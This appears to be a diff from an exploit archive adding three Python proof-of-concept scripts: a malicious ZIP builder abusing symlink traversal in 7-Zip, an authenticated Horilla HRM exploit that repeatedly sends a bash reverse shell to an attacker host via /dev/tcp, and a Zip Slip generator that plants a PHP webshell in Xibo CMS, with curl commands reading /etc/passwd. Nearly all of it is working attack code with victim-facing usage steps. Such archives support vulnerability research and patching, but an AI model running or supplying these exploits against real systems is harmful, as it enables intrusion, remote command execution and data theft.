CERTCC
diff --git a/‎exploits/multiple/local/52501.py‎
Lines changed: 111 additions & 0 deletions b/‎exploits/multiple/local/52501.py‎
Lines changed: 111 additions & 0 deletions
diff --git a/‎exploits/multiple/webapps/52497.py‎
Lines changed: 145 additions & 0 deletions b/‎exploits/multiple/webapps/52497.py‎
Lines changed: 145 additions & 0 deletions
diff --git a/‎exploits/multiple/webapps/52500.py‎
Lines changed: 136 additions & 0 deletions b/‎exploits/multiple/webapps/52500.py‎
Lines changed: 136 additions & 0 deletions
@@ -0,0 +1,111 @@
+# Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP
+# Date: 2025-11-22
+# Author: Mohammed Idrees Banyamer
+# Author Country: Jordan
+# Instagram: @banyamer_security
+# GitHub: https://github.com/mbanyamer
+# Vendor Homepage: https://www.7-zip.org
+# Software Link: https://www.7-zip.org/download.html
+# Version: 7-Zip < 25.00
+# Tested on: Windows 10 / Windows 11 (7-Zip 24.xx)
+# CVE: CVE-2025-11001
+# CVSS: 8.8 (High) - draft estimation
+# Category: Local Privilege Escalation / Remote Code Execution
+# Platform: Windows
+# CRITICAL: Yes - Public exploit available, active exploitation reported
+# Including: Directory Traversal via crafted symlink entry in ZIP archive
+# Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator
+# Fix: Upgrade to 7-Zip 25.00 or later
+# Advisory: https://www.7-zip.org/history.txt
+# Patch: https://github.com/ip7z/7zip/releases/tag/25.00
+# Target: Windows systems running vulnerable 7-Zip versions
+
+import struct
+import os
+import argparse
+import sys
+
+def build_zip(target_path, payload_file, output_zip):
+    if not os.path.isfile(payload_file):
+        print(f"[-] Payload file not found: {payload_file}")
+        sys.exit(1)
+
+    payload_name = os.path.basename(payload_file)
+    payload_data = open(payload_file, "rb").read()
+
+    target = target_path.replace("\\", "/").strip("/") + "/"
+    traversal = "../../../../" + target
+
+    with open(output_zip, "wb") as f:
+        offset = 0
+
+        symlink_name = "evil.lnk"
+        symlink_target = traversal.encode() + b"\x00"
+        symlink_extra = struct.pack("<HH", 0x756e, len(symlink_target)) + symlink_target
+
+        symlink_header = struct.pack("<IHHHHHHIIIHH",
+            0x04034b50, 20, 0x800, 0x800, 0, 0, 0,
+            0, 0, 0,
+            len(symlink_name), len(symlink_extra))
+
+        f.write(symlink_header)
+        f.write(symlink_name.encode())
+        f.write(symlink_extra)
+        f.write(b"")
+        symlink_central_offset = offset
+        offset += len(symlink_header) + len(symlink_name) + len(symlink_extra)
+
+        payload_header = struct.pack("<IHHHHHHIIIHH",
+            0x04034b50, 20, 0x800, 0, 0, 0,
+            0, len(payload_data), len(payload_data),
+            len(payload_name), 0)
+
+        f.write(payload_header)
+        f.write(payload_name.encode())
+        f.write(payload_data)
+        payload_central_offset = offset
+        offset += len(payload_header) + len(payload_name) + len(payload_data)
+
+        cd_offset = offset
+
+        f.write(struct.pack("<IHHHHHHIIIHHHHHII",
+            0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
+            0, 0, 0,
+            len(symlink_name), len(symlink_extra), 0, 0, 0, 0o777 << 16 | 0xA1ED, symlink_central_offset))
+        f.write(symlink_name.encode())
+        f.write(symlink_extra)
+
+        f.write(struct.pack("<IHHHHHHIIIHHHHHII",
+            0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
+            0, len(payload_data), len(payload_data),
+            len(payload_name), 0, 0, 0, 0, 0o777 << 16, payload_central_offset))
+        f.write(payload_name.encode())
+
+        f.write(struct.pack("<IHHHHIIH",
+            0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0))
+
+    print(f"[+] Malicious archive created: {output_zip}")
+    print(f"[+] Target path          : {target_path}")
+    print(f"[+] Payload file         : {payload_name} ({len(payload_data)} bytes)")
+    print(f"[+] Final write location : {target_path}\\{payload_name}")
+    print("\n[*] Usage:")
+    print("    1. Send the ZIP file to the victim")
+    print("    2. Victim must run 7-Zip < 25.00 as Administrator")
+    print("    3. Victim opens and extracts the ZIP → payload dropped silently")
+    print("    4. Achievement unlocked")
+
+if __name__ == "__main__":
+    banner = """
+    CVE-2025-11001 - 7-Zip Directory Traversal PoC
+    Author: Mohammed Idrees Banyamer (@banyamer_security)
+    """
+    print(banner)
+
+    parser = argparse.ArgumentParser(description="CVE-2025-11001 Exploit - 7-Zip < 25.00")
+    parser.add_argument("-t", "--target", required=True, help="Target directory (e.g. C:\\Windows\\System32)")
+    parser.add_argument("-p", "--payload", required=True, help="Payload file to drop (e.g. C:\\Windows\\System32\\calc.exe)")
+    parser.add_argument("-o", "--output", default="CVE-2025-11001-exploit.zip", help="Output ZIP filename (default: CVE-2025-11001-exploit.zip)")
+
+    args = parser.parse_args()
+
+    build_zip(args.target, args.payload, args.output)
@@ -0,0 +1,145 @@
+# Exploit Title:  Horilla v1.3 - RCE
+# Date: 2025-05-29
+# Exploit Author: Raghad Abdallah Al-syouf
+# Version: <= 1.3
+# Tested on: Ubuntu / Docker
+# CVE: CVE-2025-48868
+
+
+Description:
+This script exploits the authenticated RCE vulnerability CVE-2025-48868.
+It logs into the target web app, creates a project, and sends payloads
+to achieve a reverse shell connection to a listener **started manually** by the user.
+
+Usage:
+    python3 CVE_2025_48868.py --url http[s]://target:port --user username --pass password --lhost YOUR_IP --lport LISTENER_PORT
+
+Example:
+    python3 CVE_2025_48868.py --url http://127.0.0.1:8000 --user admin --pass admin --lhost 192.168.1.100 --lport 4444
+"""
+
+import requests
+import time
+import sys
+import argparse
+from bs4 import BeautifulSoup
+import urllib3
+import random
+import string
+from datetime import datetime
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def generate_random_title():
+    letters = ''.join(random.choices(string.ascii_lowercase, k=4))
+    digits = ''.join(random.choices(string.digits, k=2))
+    return letters + digits
+
+def main():
+    print("[+] CVE-2025-48868")
+
+    parser = argparse.ArgumentParser(description='Exploit for CVE-2025-48868: Authenticated RCE in Horilla HRM software v1.3. Exploit by:Nakleh Said Zeidan')
+    parser.add_argument('--url', required=True, help='Target URL, e.g. http://localhost:8000')
+    parser.add_argument('--user', required=True, help='Username for login')
+    parser.add_argument('--pass', required=True, dest='password', help='Password for login')
+    parser.add_argument('--lhost', required=True, help='Attacker IP (listener must be started manually)')
+    parser.add_argument('--lport', required=True, type=int, help='Attacker port (listener must be started manually)')
+
+    args = parser.parse_args()
+
+    base_url = args.url.rstrip('/')
+    login_url = f"{base_url}/login/"
+    project_url = f"{base_url}/project/project-bulk-archive"
+    session = requests.Session()
+    headers = {
+        "User-Agent": "Mozilla/5.0",
+        "X-Requested-With": "XMLHttpRequest"
+    }
+
+    print("[+] Getting login page...")
+    login_page = session.get(login_url, headers=headers, verify=False)
+    if login_page.status_code != 200:
+        print(f"[-] Failed to load login page, status {login_page.status_code}")
+        sys.exit(1)
+
+    soup = BeautifulSoup(login_page.text, 'html.parser')
+    csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']
+
+    login_data = {
+        "username": args.user,
+        "password": args.password,
+        "csrfmiddlewaretoken": csrf_token
+    }
+
+    print("[+] Logging in...")
+    login_resp = session.post(login_url, data=login_data, headers=headers, verify=False)
+    if login_resp.status_code != 200 or "logout" not in login_resp.text.lower():
+        print("[-] Login failed")
+        sys.exit(1)
+    print("[+] Logged in successfully!")
+
+    project_view_url = f"{base_url}/project/project-view/"
+    project_view = session.get(project_view_url, headers=headers, verify=False)
+    soup = BeautifulSoup(project_view.text, 'html.parser')
+    csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']
+
+    print("[+] Creating project...")
+    create_project_url = f"{base_url}/project/create-project?"
+    today_str = datetime.now().strftime("%Y-%m-%d")
+    random_title = generate_random_title()
+    multipart_data = {
+        "is_active": "on",
+        "title": random_title,
+        "managers": "1",
+        "members": "1",
+        "status": "new",
+        "start_date": today_str,
+        "end_date": today_str,
+        "description": "Exploit project"
+    }
+
+    create_headers = {
+        "User-Agent": "Mozilla/5.0",
+        "Accept": "*/*",
+        "Referer": project_view_url,
+        "HX-Request": "true",
+        "HX-Trigger": "hlvd701Form",
+        "HX-Target": "hlvd701Form",
+        "HX-Current-URL": project_view_url,
+        "X-CSRFToken": csrf_token,
+        "Origin": base_url,
+        "DNT": "1",
+        "Connection": "keep-alive",
+    }
+
+    create_resp = session.post(create_project_url, data=multipart_data, headers=create_headers, verify=False)
+    if create_resp.status_code == 200:
+        print(f"[+] Project created successfully with title: {random_title}")
+    else:
+        print(f"[-] Project creation may have failed (status {create_resp.status_code}), continuing anyway...")
+
+    headers["Referer"] = project_view_url
+    headers["Origin"] = base_url
+    headers["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
+
+    print("[*] Ensure your listener is running: `nc -lvnp {}`".format(args.lport))
+    print("[+] Sending payload...")
+
+    i = 1
+    while True:
+        encoded_ids = f"%5B%22{i}%22%5D"
+        payload = f"__import__('os').system('bash+-c+\"bash+-i+>%26+/dev/tcp/{args.lhost}/{args.lport}+0>%261\"')"
+        exploit_url = f"{project_url}?is_active={payload}"
+        data = f"csrfmiddlewaretoken={csrf_token}&ids={encoded_ids}"
+        response = session.post(exploit_url, headers=headers, data=data, verify=False)
+
+        if response.status_code == 200:
+            print(f"[+] Payload sent for project id {i}. Waiting for shell...")
+        else:
+            print(f"[-] Error sending payload for project id {i} (status {response.status_code})")
+
+        time.sleep(3)
+        i += 1
+
+if __name__ == "__main__":
+    main()
@@ -0,0 +1,136 @@
+# Exploit Title: XiboCMS 3.3.4-  Remote Code Execution
+# Google Dork: N/A
+# Date: 2025-11-18
+# Exploit Author: complexusprada
+# Vendor Homepage: https://xibo.org.uk/
+# Software Link: https://github.com/xibosignage/xibo-cms
+# Version: 1.8.0 - 2.3.16, 3.0.0 - 3.3.4
+# Tested on: Ubuntu Linux (Docker), Xibo CMS 3.3.4
+# CVE: CVE-2023-33177
+# GHSA: GHSA-jj27-x85q-crqv
+# Category: webapps
+
+"""
+# Vulnerability Description:
+# Xibo CMS contains a path traversal vulnerability (Zip Slip) in the layout import
+# functionality. The application fails to properly validate file paths in the mapping.json
+# file within uploaded ZIP archives, allowing authenticated attackers to write files
+# outside the intended library directory using path traversal sequences (../../).
+# This results in arbitrary file upload and remote code execution.
+
+# Exploitation Details:
+# 1. Attacker creates a malicious ZIP file containing a valid Xibo layout structure
+# 2. The mapping.json file contains a path traversal payload (../../web/shell.php)
+# 3. A PHP webshell is placed at the corresponding path within the ZIP structure
+# 4. When the layout is imported, Xibo extracts files without proper path validation
+# 5. The webshell is written to the web root (/var/www/cms/web/shell.php)
+# 6. Attacker gains remote code execution via the webshell
+
+# Vulnerability Chain:
+# ZIP contains:  library/../../web/shell.php
+# Mapping.json:  {"file": "../../web/shell.php", ...}
+# Xibo reads:    library/ + ../../web/shell.php
+# Xibo writes:   /var/www/cms/library/temp/ + ../../web/shell.php
+# Result:        /var/www/cms/web/shell.php (webshell in web root!)
+
+# Prerequisites:
+# - Valid Xibo CMS credentials (any authenticated user with layout import permission)
+# - Xibo CMS versions 1.8.0 - 2.3.16 or 3.0.0 - 3.3.4
+
+# Exploitation Steps:
+# 1. Run this script to generate exploit.zip
+# 2. Log in to Xibo CMS
+# 3. Navigate to: Design → Layouts → Import
+# 4. Upload the generated exploit.zip file
+# 5. Even if JSON errors occur, the webshell has been written to disk
+# 6. Access webshell at: http://<target>/shell.php?cmd=<command>
+# Example: curl 'http://target/shell.php?cmd=id'
+
+# Mitigation:
+# Upgrade to patched versions:
+# - Xibo CMS 2.3.17+ (for 2.x branch)
+# - Xibo CMS 3.3.5+ (for 3.x branch)
+
+# Disclaimer:
+# This exploit is provided for educational purposes, authorized penetration testing,
+# and vulnerability research only. Only use against systems you own or have explicit
+# written permission to test.
+"""
+
+import zipfile
+import json
+import sys
+
+def create_exploit():
+    """Generate the malicious ZIP file for Xibo CMS RCE exploit"""
+
+    print("[*] Xibo CMS Zip Slip RCE Exploit Generator")
+    print("[*] CVE-2023-33177 - Path Traversal via Layout Import")
+    print("[*] Affected: Xibo CMS 1.8.0-2.3.16, 3.0.0-3.3.4\n")
+
+    # Valid Xibo 3.0 layout structure
+    # This ensures the ZIP passes initial validation checks
+    layout_json = {
+        "layout": "Exploit Layout",
+        "description": "Path Traversal Test",
+        "layoutDefinitions": {
+            "schemaVersion": 3,
+            "width": 1920,
+            "height": 1080,
+            "backgroundColor": "#000000",
+            "backgroundzIndex": 0,
+            "code": "CVE-2023-33177",
+            "actions": [],
+            "regions": [],
+            "drawers": []
+        }
+    }
+
+    # Empty playlist - triggers JSON import code path
+    playlist_json = {}
+
+    # VULNERABILITY: Path traversal in mapping.json
+    # The 'file' field is not properly sanitized before file extraction
+    # Xibo constructs the extraction path as: library/temp/ + file['file']
+    # Using ../../ allows escaping the library directory
+    mapping_json = [{
+        "file": "../../web/shell.php",  # Path traversal payload
+        "name": "shell.php",
+        "type": "module"
+    }]
+
+    # Simple PHP webshell for command execution
+    # Accepts commands via GET parameter: ?cmd=<command>
+    webshell = b'<?php system($_GET["cmd"]); ?>'
+
+    # Create the malicious ZIP file
+    try:
+        with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf:
+            # Add required Xibo layout files
+            zf.writestr('layout.json', json.dumps(layout_json, indent=2))
+            zf.writestr('playlist.json', json.dumps(playlist_json))
+            zf.writestr('mapping.json', json.dumps(mapping_json))
+
+            # CRITICAL: The file path in the ZIP must match what Xibo expects
+            # Xibo calls: $zip->getStream('library/' . $file['file'])
+            # Therefore we place the file at: library/../../web/shell.php
+            zf.writestr('library/../../web/shell.php', webshell)
+
+        print("[+] Exploit ZIP created successfully: exploit.zip")
+        print("\n[*] Exploitation Steps:")
+        print("    1. Log in to Xibo CMS with valid credentials")
+        print("    2. Navigate to: Design → Layouts → Import")
+        print("    3. Upload exploit.zip")
+        print("    4. Ignore any JSON errors (file is already written)")
+        print("    5. Access webshell: http://<target>/shell.php?cmd=<command>")
+        print("\n[*] Example:")
+        print("    curl 'http://target/shell.php?cmd=id'")
+        print("    curl 'http://target/shell.php?cmd=cat%20/etc/passwd'")
+        print()
+
+    except Exception as e:
+        print(f"[-] Error creating exploit: {e}", file=sys.stderr)
+        sys.exit(1)
+
+if __name__ == "__main__":
+    create_exploit()